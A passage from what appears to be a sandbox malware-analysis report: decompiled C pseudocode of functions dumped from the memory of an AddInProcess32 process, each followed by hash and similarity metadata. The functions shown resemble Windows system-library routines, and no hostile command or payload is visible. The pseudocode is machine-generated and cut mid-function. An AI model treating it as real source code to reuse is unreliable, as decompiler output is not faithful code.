                              					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                              						L13:
                              						_push(_t124);
                              						if((_t106 & 0x00000002) != 0) {
                              							_push(0x200);
                              							_push(0x28);
                              							_push(0xffffffff);
                              							_t122 = E01899800();
                              							if(_t122 < 0) {
                              								L33:
                              								if((_t124[4] & 0x00000001) != 0) {
                              									_push(4);
                              									_t64 =  &(_t124[1]); // 0x4
                              									_t107 = _t64;
                              									_push(_t107);
                              									_push(5);
                              									_push(0xfffffffe);
                              									E018995B0();
                              									if( *_t107 != 0) {
                              										_push( *_t107);
                              										E018995D0();
                              									}
                              								}
                              								_push(_t124);
                              								_push(0);
                              								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                              								L37:
                              								L018777F0();
                              								return _t122;
                              							}
                              							_t124[4] = _t124[4] | 0x00000002;
                              							L18:
                              							_t108 = _a8;
                              							_t29 =  &(_t124[0x105]); // 0x414
                              							_t80 = _t29;
                              							_t30 =  &(_t124[5]); // 0x14
                              							_t124[3] = _t80;
                              							_t123 = 0;
                              							_t124[2] = _t30;
                              							 *_t80 = _t108;
                              							if(_t108 == 0) {
                              								L21:
                              								_t112 = 0x400;
                              								_push( &_v8);
                              								_v8 = 0x400;
                              								_push(_t124[2]);
                              								_push(0x400);
                              								_push(_t124[3]);
                              								_push(0);
                              								_push( *_t124);
                              								_t122 = E01899910();
                              								if(_t122 != 0xc0000023) {
                              									L26:
                              									if(_t122 != 0x106) {
                              										L40:
                              										if(_t122 < 0) {
                              											L29:
                              											_t83 = _t124[2];
                              											if(_t83 != 0) {
                              												_t59 =  &(_t124[5]); // 0x14
                              												if(_t83 != _t59) {
                              													L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                              												}
                              											}
                              											_push( *_t124);
                              											E018995D0();
                              											goto L33;
                              										}
                              										 *_a16 = _t124;
                              										return 0;
                              									}
                              									if(_t108 != 1) {
                              										_t122 = 0;
                              										goto L40;
                              									}
                              									_t122 = 0xc0000061;
                              									goto L29;
                              								} else {
                              									goto L22;
                              								}
                              								while(1) {
                              									L22:
                              									_t89 =  *0x1947b9c; // 0x0
                              									_t92 = L01874620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                              									_t124[2] = _t92;
                              									if(_t92 == 0) {
                              										break;
                              									}
                              									_t112 =  &_v8;
                              									_push( &_v8);
                              									_push(_t92);
                              									_push(_v8);
                              									_push(_t124[3]);
                              									_push(0);
                              									_push( *_t124);
                              									_t122 = E01899910();
                              									if(_t122 != 0xc0000023) {
                              										goto L26;
                              									}
                              									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                              								}
                              								_t122 = 0xc0000017;
                              								goto L26;
                              							}
                              							_t119 = 0;
                              							do {
                              								_t114 = _t124[3];
                              								_t119 = _t119 + 0xc;
                              								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                              								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                              								_t123 = _t123 + 1;
                              								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                              							} while (_t123 < _t108);
                              							goto L21;
                              						}
                              						_push(0x28);
                              						_push(3);
                              						_t122 = E0185A7B0();
                              						if(_t122 < 0) {
                              							goto L33;
                              						}
                              						_t124[4] = _t124[4] | 0x00000001;
                              						goto L18;
                              					}
                              					if((_t106 & 0x00000001) == 0) {
                              						_t115 = 0x28;
                              						_t122 = E018EE7D3(_t115, _t124);
                              						if(_t122 < 0) {
                              							L9:
                              							_push(_t124);
                              							_push(0);
                              							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                              							goto L37;
                              						}
                              						L12:
                              						if( *_t124 != 0) {
                              							goto L18;
                              						}
                              						goto L13;
                              					}
                              					_t15 =  &(_t124[1]); // 0x4
                              					_t117 = 4;
                              					_t122 = E018EE7D3(_t117, _t15);
                              					if(_t122 >= 0) {
                              						_t124[4] = _t124[4] | 0x00000001;
                              						_v12 = _v12 & 0x00000000;
                              						_push(4);
                              						_push( &_v12);
                              						_push(5);
                              						_push(0xfffffffe);
                              						E018995B0();
                              						goto L12;
                              					}
                              					goto L9;
                              				} else {
                              					return 0xc0000017;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b34617623144f46ab4dd541a22630a644c62e5ca466a07a2a1115876d40f3a7
                              • Instruction ID: 38916c721fd8635852a84eabe5944a807f7775cae3b1f9275dc0a13694d3170b
                              • Opcode Fuzzy Hash: 2b34617623144f46ab4dd541a22630a644c62e5ca466a07a2a1115876d40f3a7
                              • Instruction Fuzzy Hash: 14710032200706EFEB32DF18C848F66BBE5EF42724F144528E655DB6A1EB71EA41CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 79%
                              			E018D6DC9(signed int __ecx, void* __edx) {
                              				unsigned int _v8;
                              				intOrPtr _v12;
                              				signed int _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				char _v32;
                              				char _v36;
                              				char _v40;
                              				char _v44;
                              				char _v48;
                              				char _v52;
                              				char _v56;
                              				char _v60;
                              				void* _t87;
                              				void* _t95;
                              				signed char* _t96;
                              				signed int _t107;
                              				signed int _t136;
                              				signed char* _t137;
                              				void* _t157;
                              				void* _t161;
                              				void* _t167;
                              				intOrPtr _t168;
                              				void* _t174;
                              				void* _t175;
                              				signed int _t176;
                              				void* _t177;
                              
                              				_t136 = __ecx;
                              				_v44 = 0;
                              				_t167 = __edx;
                              				_v40 = 0;
                              				_v36 = 0;
                              				_v32 = 0;
                              				_v60 = 0;
                              				_v56 = 0;
                              				_v52 = 0;
                              				_v48 = 0;
                              				_v16 = __ecx;
                              				_t87 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                              				_t175 = _t87;
                              				if(_t175 != 0) {
                              					_t11 = _t175 + 0x30; // 0x30
                              					 *((short*)(_t175 + 6)) = 0x14d4;
                              					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                              					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                              					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                              					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                              					E018D6B4C(_t167, _t11, 0x214,  &_v8);
                              					_v12 = _v8 + 0x10;
                              					_t95 = E01877D50();
                              					_t137 = 0x7ffe0384;
                              					if(_t95 == 0) {
                              						_t96 = 0x7ffe0384;
                              					} else {
                              						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					}
                              					_push(_t175);
                              					_push(_v12);
                              					_push(0x402);
                              					_push( *_t96 & 0x000000ff);
                              					E01899AE0();
                              					_t87 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                              					_t176 = _v16;
                              					if((_t176 & 0x00000100) != 0) {
                              						_push( &_v36);
                              						_t157 = 4;
                              						_t87 = E018D795D( *((intOrPtr*)(_t167 + 8)), _t157);
                              						if(_t87 >= 0) {
                              							_v24 = E018D795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                              							_v28 = E018D795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                              							_push( &_v52);
                              							_t161 = 5;
                              							_t168 = E018D795D( *((intOrPtr*)(_t167 + 8)), _t161);
                              							_v20 = _t168;
                              							_t107 = L01874620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                              							_v16 = _t107;
                              							if(_t107 != 0) {
                              								_v8 = _v8 & 0x00000000;
                              								 *(_t107 + 0x20) = _t176;
                              								 *((short*)(_t107 + 6)) = 0x14d5;
                              								_t47 = _t107 + 0x24; // 0x24
                              								_t177 = _t47;
                              								E018D6B4C( &_v36, _t177, 0xc78,  &_v8);
                              								_t51 = _v8 + 4; // 0x4
                              								_t178 = _t177 + (_v8 >> 1) * 2;
                              								_v12 = _t51;
                              								E018D6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                              								_v12 = _v12 + _v8;
                              								E018D6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                              								_t125 = _v8;
                              								_v12 = _v12 + _v8;
                              								E018D6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                              								_t174 = _v12 + _v8;
                              								if(E01877D50() != 0) {
                              									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              								}
                              								_push(_v16);
                              								_push(_t174);
                              								_push(0x402);
                              								_push( *_t137 & 0x000000ff);
                              								E01899AE0();
                              								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                              								_t168 = _v20;
                              							}
                              							_t87 = L01872400( &_v36);
                              							if(_v24 >= 0) {
                              								_t87 = L01872400( &_v44);
                              							}
                              							if(_t168 >= 0) {
                              								_t87 = L01872400( &_v52);
                              							}
                              							if(_v28 >= 0) {
                              								return L01872400( &_v60);
                              							}
                              						}
                              					}
                              				}
                              				return _t87;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                              • Instruction ID: 434e3597f61e43f35cb431fd1f6a416703cc7efa978e68070ebce54c473aee65
                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                              • Instruction Fuzzy Hash: 4B716D71A0061AEFDB10DFA9C984EEEBBB9FF48714F144469E505E7250EB34EA41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E018552A5(char __ecx) {
                              				char _v20;
                              				char _v28;
                              				char _v29;
                              				void* _v32;
                              				void* _v36;
                              				void* _v37;
                              				void* _v38;
                              				void* _v40;
                              				void* _v46;
                              				void* _v64;
                              				void* __ebx;
                              				intOrPtr* _t49;
                              				signed int _t53;
                              				short _t85;
                              				signed int _t87;
                              				signed int _t88;
                              				signed int _t89;
                              				intOrPtr _t101;
                              				intOrPtr* _t102;
                              				intOrPtr* _t104;
                              				signed int _t106;
                              				void* _t108;
                              
                              				_t93 = __ecx;
                              				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                              				_push(_t88);
                              				_v29 = __ecx;
                              				_t89 = _t88 | 0xffffffff;
                              				while(1) {
                              					E0186EEF0(0x19479a0);
                              					_t104 =  *0x1948210; // 0x12e2c88
                              					if(_t104 == 0) {
                              						break;
                              					}
                              					asm("lock inc dword [esi]");
                              					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                              					E0186EB70(_t93, 0x19479a0);
                              					if( *((char*)(_t108 + 0xf)) != 0) {
                              						_t101 =  *0x7ffe02dc;
                              						__eflags =  *(_t104 + 0x14) & 0x00000001;
                              						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                              							L9:
                              							_push(0);
                              							_push(0);
                              							_push(0);
                              							_push(0);
                              							_push(0x90028);
                              							_push(_t108 + 0x20);
                              							_push(0);
                              							_push(0);
                              							_push(0);
                              							_push( *((intOrPtr*)(_t104 + 4)));
                              							_t53 = E01899890();
                              							__eflags = _t53;
                              							if(_t53 >= 0) {
                              								__eflags =  *(_t104 + 0x14) & 0x00000001;
                              								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                              									E0186EEF0(0x19479a0);
                              									 *((intOrPtr*)(_t104 + 8)) = _t101;
                              									E0186EB70(0, 0x19479a0);
                              								}
                              								goto L3;
                              							}
                              							__eflags = _t53 - 0xc0000012;
                              							if(__eflags == 0) {
                              								L12:
                              								_t13 = _t104 + 0xc; // 0x12e2c95
                              								_t93 = _t13;
                              								 *((char*)(_t108 + 0x12)) = 0;
                              								__eflags = E0188F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                              								if(__eflags >= 0) {
                              									L15:
                              									_t102 = _v28;
                              									 *_t102 = 2;
                              									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                              									E0186EEF0(0x19479a0);
                              									__eflags =  *0x1948210 - _t104; // 0x12e2c88
                              									if(__eflags == 0) {
                              										__eflags =  *((char*)(_t108 + 0xe));
                              										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                              										 *0x1948210 = _t102;
                              										_t32 = _t102 + 0xc; // 0x0
                              										 *_t95 =  *_t32;
                              										_t33 = _t102 + 0x10; // 0x0
                              										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                              										_t35 = _t102 + 4; // 0xffffffff
                              										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                              										if(__eflags != 0) {
                              											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                              											E018D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                              										}
                              										E0186EB70(_t95, 0x19479a0);
                              										asm("lock xadd [esi], eax");
                              										if(__eflags == 0) {
                              											_push( *((intOrPtr*)(_t104 + 4)));
                              											E018995D0();
                              											L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                              										}
                              										asm("lock xadd [esi], ebx");
                              										__eflags = _t89 == 1;
                              										if(_t89 == 1) {
                              											_push( *((intOrPtr*)(_t104 + 4)));
                              											E018995D0();
                              											L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                              										}
                              										_t49 = _t102;
                              										L4:
                              										return _t49;
                              									}
                              									E0186EB70(_t93, 0x19479a0);
                              									asm("lock xadd [esi], eax");
                              									if(__eflags == 0) {
                              										_push( *((intOrPtr*)(_t104 + 4)));
                              										E018995D0();
                              										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                              										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                              									}
                              									 *_t102 = 1;
                              									asm("lock xadd [edi], eax");
                              									if(__eflags == 0) {
                              										_t28 = _t102 + 4; // 0xffffffff
                              										_push( *_t28);
                              										E018995D0();
                              										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                              									}
                              									continue;
                              								}
                              								_t93 =  &_v20;
                              								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                              								_t85 = 6;
                              								_v20 = _t85;
                              								_t87 = E0188F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                              								__eflags = _t87;
                              								if(_t87 < 0) {
                              									goto L3;
                              								}
                              								 *((char*)(_t108 + 0xe)) = 1;
                              								goto L15;
                              							}
                              							__eflags = _t53 - 0xc000026e;
                              							if(__eflags != 0) {
                              								goto L3;
                              							}
                              							goto L12;
                              						}
                              						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                              						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                              							goto L3;
                              						} else {
                              							goto L9;
                              						}
                              					}
                              					L3:
                              					_t49 = _t104;
                              					goto L4;
                              				}
                              				_t49 = 0;
                              				goto L4;
                              			}


























                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e04fc816e1d4cd919315ab1bcc7079c0e7efbb86da6075e6f1fd114df895ad1b
                              • Instruction ID: 69446a6ec3b829c0355ccd240529a861dc6d06e8820c494f8912d315436c31af
                              • Opcode Fuzzy Hash: e04fc816e1d4cd919315ab1bcc7079c0e7efbb86da6075e6f1fd114df895ad1b
                              • Instruction Fuzzy Hash: 7A51DD34205346ABDB21EF68C880B27BBE8FF90754F14091EF999C7651E770EA04CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E01882AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                              				signed short* _v8;
                              				signed short* _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr* _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				short _t56;
                              				signed int _t57;
                              				intOrPtr _t58;
                              				signed short* _t61;
                              				intOrPtr _t72;
                              				intOrPtr _t75;
                              				intOrPtr _t84;
                              				intOrPtr _t87;
                              				intOrPtr* _t90;
                              				signed short* _t91;
                              				signed int _t95;
                              				signed short* _t96;
                              				intOrPtr _t97;
                              				intOrPtr _t102;
                              				signed int _t108;
                              				intOrPtr _t110;
                              				signed int _t111;
                              				signed short* _t112;
                              				void* _t113;
                              				signed int _t116;
                              				signed short** _t119;
                              				short* _t120;
                              				signed int _t123;
                              				signed int _t124;
                              				void* _t125;
                              				intOrPtr _t127;
                              				signed int _t128;
                              
                              				_t90 = __ecx;
                              				_v16 = __edx;
                              				_t108 = _a4;
                              				_v28 = __ecx;
                              				_t4 = _t108 - 1; // -1
                              				if(_t4 > 0x13) {
                              					L15:
                              					_t56 = 0xc0000100;
                              					L16:
                              					return _t56;
                              				}
                              				_t57 = _t108 * 0x1c;
                              				_v32 = _t57;
                              				_t6 = _t57 + 0x1948204; // 0x0
                              				_t123 =  *_t6;
                              				_t7 = _t57 + 0x1948208; // 0x1948207
                              				_t8 = _t57 + 0x1948208; // 0x1948207
                              				_t119 = _t8;
                              				_v36 = _t123;
                              				_t110 = _t7 + _t123 * 8;
                              				_v24 = _t110;
                              				_t111 = _a4;
                              				if(_t119 >= _t110) {
                              					L12:
                              					if(_t123 != 3) {
                              						_t58 =  *0x1948450; // 0x0
                              						if(_t58 == 0) {
                              							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                              						}
                              					} else {
                              						_t26 = _t57 + 0x194821c; // 0x0
                              						_t58 =  *_t26;
                              					}
                              					 *_t90 = _t58;
                              					goto L15;
                              				} else {
                              					goto L2;
                              				}
                              				while(1) {
                              					_t116 =  *_t61 & 0x0000ffff;
                              					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                              					if(_t116 == _t128) {
                              						goto L18;
                              					}
                              					L5:
                              					if(_t116 >= 0x61) {
                              						if(_t116 > 0x7a) {
                              							_t97 =  *0x1946d5c; // 0x7f170654
                              							_t72 =  *0x1946d5c; // 0x7f170654
                              							_t75 =  *0x1946d5c; // 0x7f170654
                              							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                              						} else {
                              							_t116 = _t116 - 0x20;
                              						}
                              					}
                              					if(_t128 >= 0x61) {
                              						if(_t128 > 0x7a) {
                              							_t102 =  *0x1946d5c; // 0x7f170654
                              							_t84 =  *0x1946d5c; // 0x7f170654
                              							_t87 =  *0x1946d5c; // 0x7f170654
                              							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                              						} else {
                              							_t128 = _t128 - 0x20;
                              						}
                              					}
                              					if(_t116 == _t128) {
                              						_t61 = _v12;
                              						_t96 = _v8;
                              					} else {
                              						_t113 = _t116 - _t128;
                              						L9:
                              						_t111 = _a4;
                              						if(_t113 == 0) {
                              							_t115 =  &(( *_t119)[_t111 + 1]);
                              							_t33 =  &(_t119[1]); // 0x100
                              							_t120 = _a8;
                              							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                              							_t35 = _t95 - 1; // 0xff
                              							_t124 = _t35;
                              							if(_t120 == 0) {
                              								L27:
                              								 *_a16 = _t95;
                              								_t56 = 0xc0000023;
                              								goto L16;
                              							}
                              							if(_t124 >= _a12) {
                              								if(_a12 >= 1) {
                              									 *_t120 = 0;
                              								}
                              								goto L27;
                              							}
                              							 *_a16 = _t124;
                              							_t125 = _t124 + _t124;
                              							E0189F3E0(_t120, _t115, _t125);
                              							_t56 = 0;
                              							 *((short*)(_t125 + _t120)) = 0;
                              							goto L16;
                              						}
                              						_t119 =  &(_t119[2]);
                              						if(_t119 < _v24) {
                              							L2:
                              							_t91 =  *_t119;
                              							_t61 = _t91;
                              							_v12 = _t61;
                              							_t112 =  &(_t61[_t111]);
                              							_v8 = _t112;
                              							if(_t61 >= _t112) {
                              								break;
                              							} else {
                              								_t127 = _v16 - _t91;
                              								_t96 = _t112;
                              								_v20 = _t127;
                              								_t116 =  *_t61 & 0x0000ffff;
                              								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                              								if(_t116 == _t128) {
                              									goto L18;
                              								}
                              								goto L5;
                              							}
                              						} else {
                              							_t90 = _v28;
                              							_t57 = _v32;
                              							_t123 = _v36;
                              							goto L12;
                              						}
                              					}
                              					L18:
                              					_t61 =  &(_t61[1]);
                              					_v12 = _t61;
                              					if(_t61 >= _t96) {
                              						break;
                              					}
                              					_t127 = _v20;
                              				}
                              				_t113 = 0;
                              				goto L9;
                              			}







































                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01d70d8f217c47927b7176275aca4124701d6d46a9d0559b29087073517f9d57
                              • Instruction ID: d5a59b8744ce0d5c4f3a6b24ff68bb42360cd2416e8305a236291b35ce2aa291
                              • Opcode Fuzzy Hash: 01d70d8f217c47927b7176275aca4124701d6d46a9d0559b29087073517f9d57
                              • Instruction Fuzzy Hash: EB519EB6A01129CFCB18EF5CC8809BDB7F2FB88704719845AE846DB355E730AB51DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E0191AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                              				signed int _v8;
                              				signed int _v12;
                              				void* __esi;
                              				void* __ebp;
                              				signed short* _t36;
                              				signed int _t41;
                              				char* _t42;
                              				intOrPtr _t43;
                              				signed int _t47;
                              				void* _t52;
                              				signed int _t57;
                              				intOrPtr _t61;
                              				signed char _t62;
                              				signed int _t72;
                              				signed char _t85;
                              				signed int _t88;
                              
                              				_t73 = __edx;
                              				_push(__ecx);
                              				_t85 = __ecx;
                              				_v8 = __edx;
                              				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                              				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                              				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                              					_t57 = _t57 | 0x00000001;
                              				}
                              				_t88 = 0;
                              				_t36 = 0;
                              				_t96 = _a12;
                              				if(_a12 == 0) {
                              					_t62 = _a8;
                              					__eflags = _t62;
                              					if(__eflags == 0) {
                              						goto L12;
                              					}
                              					_t52 = E0191C38B(_t85, _t73, _t57, 0);
                              					_t62 = _a8;
                              					 *_t62 = _t52;
                              					_t36 = 0;
                              					goto L11;
                              				} else {
                              					_t36 = E0191ACFD(_t85, _t73, _t96, _t57, _a8);
                              					if(0 == 0 || 0 == 0xffffffff) {
                              						_t72 = _t88;
                              					} else {
                              						_t72 =  *0x00000000 & 0x0000ffff;
                              					}
                              					 *_a12 = _t72;
                              					_t62 = _a8;
                              					L11:
                              					_t73 = _v8;
                              					L12:
                              					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                              						L19:
                              						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                              							L22:
                              							_t74 = _v8;
                              							__eflags = _v8;
                              							if(__eflags != 0) {
                              								L25:
                              								__eflags = _t88 - 2;
                              								if(_t88 != 2) {
                              									__eflags = _t85 + 0x44 + (_t88 << 6);
                              									_t88 = E0191FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                              									goto L34;
                              								}
                              								L26:
                              								_t59 = _v8;
                              								E0191EA55(_t85, _v8, _t57);
                              								asm("sbb esi, esi");
                              								_t88 =  ~_t88;
                              								_t41 = E01877D50();
                              								__eflags = _t41;
                              								if(_t41 == 0) {
                              									_t42 = 0x7ffe0380;
                              								} else {
                              									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              								}
                              								__eflags =  *_t42;
                              								if( *_t42 != 0) {
                              									_t43 =  *[fs:0x30];
                              									__eflags =  *(_t43 + 0x240) & 0x00000001;
                              									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                              										__eflags = _t88;
                              										if(_t88 != 0) {
                              											E01911608(_t85, _t59, 3);
                              										}
                              									}
                              								}
                              								goto L34;
                              							}
                              							_push(_t62);
                              							_t47 = E01921536(0x1948ae4, (_t74 -  *0x1948b04 >> 0x14) + (_t74 -  *0x1948b04 >> 0x14), _t88, __eflags);
                              							__eflags = _t47;
                              							if(_t47 == 0) {
                              								goto L26;
                              							}
                              							_t74 = _v12;
                              							_t27 = _t47 - 1; // -1
                              							_t88 = _t27;
                              							goto L25;
                              						}
                              						_t62 = _t85;
                              						if(L0191C323(_t62, _v8, _t57) != 0xffffffff) {
                              							goto L22;
                              						}
                              						_push(_t62);
                              						_push(_t88);
                              						E0191A80D(_t85, 9, _v8, _t88);
                              						goto L34;
                              					} else {
                              						_t101 = _t36;
                              						if(_t36 != 0) {
                              							L16:
                              							if(_t36 == 0xffffffff) {
                              								goto L19;
                              							}
                              							_t62 =  *((intOrPtr*)(_t36 + 2));
                              							if((_t62 & 0x0000000f) == 0) {
                              								goto L19;
                              							}
                              							_t62 = _t62 & 0xf;
                              							if(E018FCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                              								L34:
                              								return _t88;
                              							}
                              							goto L19;
                              						}
                              						_t62 = _t85;
                              						_t36 = E0191ACFD(_t62, _t73, _t101, _t57, _t62);
                              						if(_t36 == 0) {
                              							goto L19;
                              						}
                              						goto L16;
                              					}
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e97bd4f156478950b5d862fc7a4fa810eb770df234a0a2bcbd3109b8cfad6b6
                              • Instruction ID: 6abe1281a26a03237c532d60ee7841f8c112cedff034b95398c2eb89279861e5
                              • Opcode Fuzzy Hash: 5e97bd4f156478950b5d862fc7a4fa810eb770df234a0a2bcbd3109b8cfad6b6
                              • Instruction Fuzzy Hash: 8041D4B17022995BD726CA29C884F3FB79EEF84611F044619F91E873D8D734DD81C691
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E0187DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				char _v5;
                              				signed int _v12;
                              				signed int* _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				intOrPtr _v44;
                              				void* __ebx;
                              				void* __edi;
                              				signed int _t54;
                              				char* _t58;
                              				signed int _t66;
                              				intOrPtr _t67;
